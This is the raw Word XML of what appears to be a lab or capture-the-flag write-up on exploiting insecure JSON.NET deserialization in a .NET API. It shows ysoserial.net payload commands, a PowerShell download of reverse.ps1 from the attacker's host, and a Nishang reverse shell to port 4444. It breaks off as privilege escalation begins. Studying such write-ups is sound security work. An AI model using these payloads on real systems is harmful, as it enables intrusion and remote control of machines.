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JSON machine. If you require support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">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nzox0pqx8ria"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understand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nz47jjom8pdn"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2451100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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619500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Navigating to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/API</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we have a help page explaining how to interact with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">API</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can use several methods such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET, POST, PUT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE.</w:t>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60700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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making some requests using these methods, we find something interesting when sending a request using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> method.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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343400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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now send a request to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">api/Values. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercept it using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then send it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> so we can modify and resend it as many times as necessary.</w:t>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doing that, we modify:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">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Accept: application/xml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">application/json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">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Content-Type</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">application/json</w:t>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way, the response will be returned in JSON format instead of XML, and we can send JSON in the request body.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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1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"test": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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"$type": "System.Object, mscorlib"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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1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81300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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a5hg9njni5zm" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Deserialization with JSON .NET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/pwntester/ysoserial.net</w:t>
        </w:r>
      </w:hyperlink>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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://ysoserial.net/</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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a collection of utilities and property-oriented programming “gadget chains” discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing insecure object deserialization. The main driver program takes a user-specified command and wraps it in a user-specified gadget chain, then serializes those objects to stdout. When an application with the necessary gadgets in the classpath insecurely deserializes this data, the chain is automatically invoked and executes the command on the application host.</w:t>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download it to our machine (it must be Windows in order to generate the payload).</w:t>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downloading it, we will use a payload that simply sends ICMP packets (Ping) to our machine. That way, we can verify command execution on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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will use the gadget → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectDataProvider</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping -n 5 &lt;IP-VPN&gt;" -t</w:t>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Before sending the payload in the request body, we will use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</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to capture ICMP packets. If we have RCE, the target machine will ping our host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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63700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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5943600" cy="16637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tcpdump -i tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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39900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.us7ohc36mln" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending the Payload</w:t>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962400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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payload, we immediately receive a response from the machine validating our ability to execute code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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38400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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From this point, we can use either </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nishang PowerShell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain a reverse shell. I chose </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nishang TCP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hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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downloading it, simply add the following command to the last line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">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0"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-PowerShellTcp -Reverse -IPAddress &lt;IP-VPN&gt; -Port 4444</w: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vaeq8z36r2ap" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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generate a payload to download our reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "powershell.exe -Command Invoke-WebRequest -Uri http://&lt;IP-VPN&gt;/reverse.ps1 -OutFile C:\Windows\Temp\reverse.ps1" -t</w:t>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38300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Start a Python server to host </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse.ps1</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3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20900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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59436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send the generated payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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911600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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it, we see a request from the server downloading our reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2070100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="20701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generate another payload to execute the reverse shell saved in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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36700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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Open a Netcat listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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71700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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Send the payload again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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76600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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it, we receive the connection in Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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08200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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Style w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4njsadv1p7sr" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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Once inside the machine, I start basic reconnaissance by executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami /priv</w:t>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command returns information about the current user, group memberships, and privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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find something interesting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege:</w: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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.tj6726qbdegf" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">About </w:t>
      </w:r>
